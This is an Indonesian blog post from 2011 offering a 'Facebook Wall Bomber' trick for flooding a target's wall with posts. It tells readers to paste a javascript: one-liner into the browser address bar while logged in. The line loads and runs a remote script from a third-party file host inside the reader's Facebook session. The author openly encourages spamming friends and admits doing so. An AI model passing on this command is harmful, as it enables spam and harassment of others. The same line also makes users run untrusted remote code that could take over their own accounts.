Selasa, 22 Februari 2011

Facebook Wall Boomber [Script]

Apa sih maksud judul topik yang saya tulis di atas, maksudnya kita bisa mengirim post ke wall seseorang dengan jumlah yang banyak dalam sekali klik sama saja kayak sms bomber & email bomber

Buat kamu yang suka ngejunk, nyampah & bikin spam di wall orang bisa di coba tips berikut, tapi sekedar saran dari saya bijaklah menggunakan Facebook Wall Bomber karena kalau kamu terlalu sering menggunakan cara ini akun Facebook kamu bisa saja kena blokir karena kamu bisa di anggap melakukan spam, tapi kalau jarang2 sih mudah2an aman karena saya sendiri sudah 3X ngebom wall teman saya, buat temen saya yang wall nya di jadiin bahan percobaan maaf banget ya..

Jika Kamu ingin mengirim 200 pesan wall,,kamu hanya perlu 2 kali klik saja,,tidak perlu capek2 sampai 200 kali kerja

Caranya bagaimana..??
  • Login ke Facebook
  • Pergi ke wall facebook target kamu
  • Kemudian Hapus semua URL/Link yg ada di addresbar wall facebook targetmu
  • Copy Paste Kode di bawah ini ke address bar yg telah di hapus tadi
 javascript:(a = (b = document).createElement("script")).src = "//spsc66.fileave.com/boomber.js", b.body.appendChild(a); void(0);

Keterangan Gambar setelah memasukan Scriptnya :


  
karena saya hanya mengrimkan sebanyak 10 pesan,,ntar jadinya gini nih

0 komentar:

Posting Komentar

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites